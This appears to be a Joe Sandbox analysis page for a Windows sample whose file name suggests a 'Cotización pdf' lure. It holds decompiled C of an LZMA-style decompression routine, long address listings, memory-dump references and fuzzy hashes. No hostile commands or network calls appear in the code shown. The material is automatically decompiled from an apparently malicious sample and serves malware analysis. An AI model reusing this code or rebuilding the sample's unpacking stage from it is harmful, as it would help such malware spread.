								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406398
0x00406398
0x0040639c
0x00406453
0x00406456
0x00406462
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x0040672b
0x00000000
0x0040672b
0x004063a2
0x004063a6
0x004068e7
0x004068e7
0x004068ea
0x004068ee
0x004068ee
0x004063ac
0x004063b2
0x004063b5
0x004063b9
0x004063bc
0x004063c0
0x00406886
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x00000000
0x004068e3
0x004063c6
0x004063c9
0x004063cf
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x004063fa
0x004063fa
0x004063fa
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x00000000
0x004066b5
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00000000
0x00406828
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x00000000
0x0040667d
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00405E9D, Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
